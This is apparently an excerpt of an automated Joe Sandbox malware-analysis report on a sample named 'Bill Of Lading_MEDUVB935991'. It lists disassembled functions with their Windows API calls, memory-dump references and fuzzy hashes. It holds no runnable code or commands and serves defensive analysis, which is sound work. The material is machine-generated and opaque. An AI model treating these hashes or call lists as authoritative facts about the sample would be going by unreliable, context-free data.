                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3240763771-0
                                                                                                                      • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                      • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                      • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                      • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                      • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                      • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2286883814-0
                                                                                                                      • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                      • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                      • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                      • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                      • #21.WSOCK32 ref: 004740E0
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1881357543-0
                                                                                                                      • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                                      • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                      • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                                      • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                      • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                      • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                      • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                      • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
• Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
• GetLastError.KERNEL32(?,00000000), ref: 0045D12B
• DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
• Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
APIs
• GetParent.USER32(?), ref: 004505BF
• DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
• DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
• DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
• Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
APIs
  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
• __itow.LIBCMT ref: 00461461
• __itow.LIBCMT ref: 004614AB
Similarity
• API ID: MessageSend$__itow$_wcslen
• String ID:
• API String ID: 2875217250-0
• Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
• Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
APIs
• GetForegroundWindow.USER32 ref: 00472806
  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
• GetCaretPos.USER32(?), ref: 0047281A
• ClientToScreen.USER32(00000000,?), ref: 00472856
• GetForegroundWindow.USER32 ref: 0047285C
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
• Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• GetWindowLongW.USER32(?,000000EC), ref: 0047728E
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
• Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
• Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
• Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
APIs
• SendMessageW.USER32 ref: 00448CB8
• GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
• Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
• Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
• Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
APIs
• select.WSOCK32 ref: 0045890A
• __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
• accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
• WSAGetLastError.WSOCK32(00000000), ref: 00458952
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
• Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
• Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
• Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                      • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                      • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                      • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1358664141-0
                                                                                                                      • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                      • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                      • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                      • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880819207-0
                                                                                                                      • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                      • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                      • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                      • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                      • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                      • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                      • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                      • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1187119602-0
                                                                                                                      • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                      • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                      • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                      • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1597257046-0
                                                                                                                      • Opcode ID: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                      • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                      • Opcode Fuzzy Hash: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                      • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3349847261-0
                                                                                                                      • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
• Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B60B
• InterlockedExchange.KERNEL32(?,?), ref: 0044B619
• LeaveCriticalSection.KERNEL32(?), ref: 0044B630
• LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
